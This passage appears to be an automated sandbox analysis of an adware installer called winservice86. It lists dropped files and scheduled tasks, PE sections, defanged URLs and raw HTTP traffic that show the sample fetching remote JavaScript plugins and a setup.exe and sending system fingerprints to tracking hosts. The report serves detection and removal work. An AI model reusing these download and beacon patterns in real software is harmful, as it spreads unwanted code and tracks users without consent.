      %Program Files%\winservice86\winservice86-codedownloader.exe (7433 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (953 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (4 bytes)
      %Program Files%\winservice86\background.html (729 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (2 bytes)
      %Program Files%\winservice86\winservice86.ico (9 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe (9098 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\288[1].js (963 bytes)
      %WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-11.job (76 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
      %Program Files%\winservice86\winservice86-bg.exe (3361 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\253[1].js (735 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll (1281 bytes)
      %WinDir%\Tasks\f56fe68c-ded6-4656-a272-5100e7b20016.job (1620 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (1 bytes)
      %Program Files%\winservice86\WebSocket4Net.dll (64 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\91[1].js (88337 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\42.js (7 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\93.js (953 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\345[1].js (781 bytes)
      %WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-1.job (73 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\inetc.dll (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\41.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\manifest.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\64.js (2 bytes)
      %Program Files%\winservice86\Interop.IWshRuntimeLibrary.dll (53 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\14.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-1.dll (34023 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\46.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils.dll (27704 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\94.js (1 bytes)
      %WinDir%\Tasks\temp_f56fe68c-ded6-4656-a272-5100e7b20016.job (1066 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdateres_en.dll (26 bytes)
      %Program Files%\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe (32 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\269.js (493 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\91.js (6584 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\extension.js (614 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\230.js (869 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\380[1].js (25 bytes)
      %WinDir%\Tasks\temp_0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (138 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\104.js (921 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateHelper.msi (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\nsisos.dll (5 bytes)
      %WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-2.job (71 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\3.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\102.js (1 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe (5873 bytes)
      %WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-5.job (72 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psmachine.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\391[1].js (795 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\44.js (1 bytes)
      %Program Files%\winservice86\utils.exe (76825 bytes)
      %WinDir%\Tasks\0f606e8f-8393-4f75-a33c-52fa23d9dc61.job (70 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe (14022 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\354[1].js (60025 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe (601 bytes)
      %WinDir%\Tasks\temp_17b03655-7c85-4e93-aec7-7ee27469780e-2.job (140 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\474543 (359414 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\390[1].js (823 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\app_code[1].js (617 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\221.js (415 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\376[1].js (1417 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\78.js (3 bytes)
      %Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.crx (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\psuser.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\339[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\39.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[1].xml (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\263.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\102[1].js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\311[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\35.js (9 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bg_code[1].js (432 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\242.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-4.dll (43318 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\UserInfo.dll (4 bytes)
      %Program Files%\winservice86\Uninstall.exe (601 bytes)
      %Program Files%\winservice86\SuperSocket.ClientEngine.Core.dll (26 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\36.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\update.json (39 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\195.js (410 bytes)
      %Program Files%\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\md5dll.dll (6 bytes)

    4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.

    Static Analysis

    VersionInfo

    Company Name:
    Product Name:
    Product Version:
    Legal Copyright:
    Legal Trademarks:
    Original Filename:
    Internal Name:
    File Version: 1.35.9.29
    File Description:
    Comments:
    Language: English (United States)

    Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 1.35.9.29File Description: Comments: Language: English (United States)

    PE Sections

    Name Virtual Address Virtual Size Raw Size Entropy Section MD5
    .text409634880353284.13209c061a4f004f4d6347691f4655fa02103
    .data409601405120.818128a5a710a52d844b19513b2cab5693dbc3
    .rdata45056910892164.0908004265d16597098398ce8e06897dcd29
    .bss5734425288000d41d8cd98f00b204e9800998ecf8427e
    .idata311296486851203.6475620f692042b54593897a705a64d67ce50
    .ndata3194888765440819200829f71740aab1ab98b33eae21dee122
    .rsrc908492812440128002.0553715d118c4337fd84e426a690557b0baa

    Dropped from:

    Downloaded by:

    Similar by SSDeep:

    Similar by Lavasoft Polymorphic Checker:

    Network Activity

    URLs

    URL IP
    hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/002201/update.json
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=1456422018
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=1456422014
    hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
    hxxp://a767.dspw65.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    hxxp://e6845.dscb1.akamaiedge.net/ThawteTimestampingCA.crl
    hxxp://e6845.dscb1.akamaiedge.net/tss-ca-g2.crl
    hxxp://crl.usertrust.com/UTN-USERFirst-Object.crl178.255.83.2
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=15720
    hxxp://crl.comodoca.com.cdn.cloudflare.net/COMODOCodeSigningCA2.crl104.16.89.188
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=3029
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=6315
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=9830
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=5028
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/390.js?ver=1&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/424.js?ver=3&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/391.js?ver=1&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/223.js?ver=9&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/200.js?ver=6&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/273.js?ver=6&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/288.js?ver=4&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/311.js?ver=4&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/339.js?ver=3&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/380.js?ver=1&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/220.js?ver=46&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/184.js?ver=11&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/180.js?ver=20&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/102.js?ver=15&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/91.js?ver=186&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/376.js?ver=12&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/354.js?ver=2&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/345.js?ver=47&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/253.js?ver=2&rnd=8467
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/246.js?ver=17&rnd=8467
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=8700
    hxxp://fallback.global-ssl.fastly.net/download/66/60001/DNSUnlocker/setup.exe
    hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=3481
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=1461
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=1456422042
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=1456422042
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=1456422014
    hxxp://js.newcloudrack.com/plugin/apps/64755/plugins/na/ie/plugins.json?ver=128&rnd=502869.16.175.10
    hxxp://cdn.roastfiles2017.com/download/66/60001/DNSUnlocker/setup.exe185.31.17.249
    hxxp://js.newcloudrack.com/plugins/mins/273.js?ver=6&rnd=4169.16.175.10
    hxxp://logs.newdemoonlinecloud.com/monetization.gif?event=3&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&browser=ie,de,te,tc&rnd=145642201469.16.175.42
    hxxp://js.newcloudrack.com/plugins/mins/376.js?ver=12&rnd=846769.16.175.10
    hxxp://update.newdemoonlinecloud.com/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg69.16.175.10
    hxxp://stats.newdemoonlinecloud.com/installer.gif?action=started&app=64755&appver=0&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=4&rnd=145642201854.231.17.4
    hxxp://update.newdemoonlinecloud.com/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=1572069.16.175.10
    hxxp://crl.thawte.com/ThawteTimestampingCA.crl23.50.101.163
    hxxp://js.newcloudrack.com/plugins/mins/220.js?ver=46&rnd=846769.16.175.10
    hxxp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.js?ver=17&rnd=983069.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/180.js?ver=20&rnd=846769.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/311.js?ver=4&rnd=4169.16.175.10
    hxxp://stats.newdemoonlinecloud.com/apps.gif?action=install&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&installtime=1456422014&lifetime=0&silent=1&crtnm=MorganEnterMode&procstarttime=1456422014&procruntime=28&rnd=145642204254.231.17.4
    hxxp://js.newcloudrack.com/plugin/apps/64755/js/na/ie/app_code.js?ver=151&rnd=631569.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/391.js?ver=1&rnd=4169.16.175.10
    hxxp://update.newdemoonlinecloud.com/installer_updates/002201/update.json69.16.175.10
    hxxp://js.newdemoonlinecloud.com/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=146169.16.175.42
    hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab77.222.148.99
    hxxp://js.newcloudrack.com/plugins/mins/223.js?ver=9&rnd=4169.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/91.js?ver=186&rnd=846769.16.175.10
    hxxp://js.newdemoonlinecloud.com/plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=43&rnd=302969.16.175.42
    hxxp://update.newdemoonlinecloud.com/omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=1572069.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/288.js?ver=4&rnd=4169.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/184.js?ver=11&rnd=846769.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/345.js?ver=47&rnd=846769.16.175.10
    hxxp://crl.comodoca.com/COMODOCodeSigningCA2.crl104.16.89.188
    hxxp://stats.newdemoonlinecloud.com/installer.gif?action=finished&app=64755&appver=151&ver=1_35_09_29&version_date=14-10-11&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&upi=6a22289fae4d15e7b765313375a3078d&procid=5E46140814414BE8B916F39AF806AE9DPI&srcid=002201&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&xpiver=0_95&crxver=1_26_43&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350017&asw=0&asw2=1073750528&asw3=0&crtnm=MorganEnterMode&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1456422014&procruntime=28&rnd=145642204254.231.17.4
    hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt77.222.148.99
    hxxp://js.newcloudrack.com/plugins/mins/424.js?ver=3&rnd=4169.16.175.10
    hxxp://logs.newdemoonlinecloud.com/monetization.gif?rand=15720&event=7&agent_type=2&ibic=8D4C23D6A4134239976F389726A57621IE&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=00220169.16.175.42
    hxxp://js.newcloudrack.com/plugins/mins/380.js?ver=1&rnd=4169.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/102.js?ver=15&rnd=846769.16.175.10
    hxxp://stats.newdemoonlinecloud.com/apps.gif?action=update&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422032&lifetime=18&oldappver=43&oldbgver=1&oldpluginsver=37&rnd=870054.231.17.4
    hxxp://ts-crl.ws.symantec.com/tss-ca-g2.crl23.50.101.163
    hxxp://js.newcloudrack.com/plugins/mins/246.js?ver=17&rnd=846769.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/339.js?ver=3&rnd=4169.16.175.10
    hxxp://logs.newdemoonlinecloud.com/monetization.gif?event=4&ibic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&campaign=002201&app=64755&bhover=1_35_09_29&xpiver=0_95&crxver=1_26_43&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1456422014&asw=0_1073750528_0&iep=1&chp=na&ffp=na&browser=ie,de,te,tc&rnd=145642201469.16.175.42
    hxxp://js.newcloudrack.com/plugins/mins/390.js?ver=1&rnd=4169.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/200.js?ver=6&rnd=4169.16.175.10
    hxxp://js.newcloudrack.com/plugins/mins/354.js?ver=2&rnd=846769.16.175.10
    hxxp://stats.newdemoonlinecloud.com/stats.gif?action=daily&app=64755&bic=8D4C23D6A4134239976F389726A57621IE&verifier=1a7df627a5d721883af6cb9355d58bf1&ver=1_35_09_29&installtime=1456422014&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=002201&subid=0&zdata=0&appver=151&bgver=17&pluginsver=128&curtime=1456422037&lifetime=23&rnd=348154.231.17.4
    hxxp://js.newcloudrack.com/plugins/mins/253.js?ver=2&rnd=846769.16.175.10

    IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

    Traffic

    GET /plugin/apps/64755/manifest/1_35_09_29/ie6/manifest.xml?ver=151&rnd=1461 HTTP/1.1

    Accept: */*

    Accept-Encoding: gzip, deflate

    Host: js.newdemoonlinecloud.com

    Connection: Keep-Alive

    Cache-Control: no-cache

    HTTP/1.1 200 OK

    Date: Thu, 25 Feb 2016 17:42:35 GMT

    Keep-Alive: timeout=5, max=100

    Connection: Keep-Alive

    Accept-Ranges: bytes

    ETag: "1456422146"

    Last-Modified: Thu, 25 Feb 2016 17:42:26 GMT

    Cache-Control: private, must-revalidate, max-age=900

    Content-Length: 1681

    Content-Type: application/xml; charset=utf-8

    X-HW: 1456422155.dop003.fr7.t,1456422155.cds047.fr7.pr

    <?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>151</Ver>. <ShortName>winservice86</ShortName>. <Description>winservice</Description>. <PublisherName>Corporate Inc</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newcloudrack.com/plugin/apps/64755/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newcloudrack.com/plugin/apps/64755/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>17</BackgroundVer>. <Manifest>NA</Manifest>. <ChangePrevious>fa

    <<< skipped >>>

    GET /omaha/84F03351-931D-41A5-A53D-6B5A7A5A2C96/1/update.xml?rand=15720&w=3:srb8i7ffVQQnms6OnFTiOVIQsPnmGlX7lcttC_6BaTih6uWhwp3mxIiy_S7lEHYybrGm75UU8k0MJPIQLiOmNYEEgZ1KfAx1MDLlZkWcKXH173vil3-SF8A76iWobp124hrEOhLy51P05wwXJr4DRa1xcxF_pKLHwzXDDCjWKGg HTTP/1.1

    User-Agent: Google Update/1.3.25.0;winhttp;cup

    X-Last-HR: 0x0

    X-Last-HTTP-Status-Code: 0

    X-Retry-Count: 0

    If-Match: "XX-K_Z3raSdv_NbJiy9qMtWg5rI"

    Host: update.newdemoonlinecloud.com

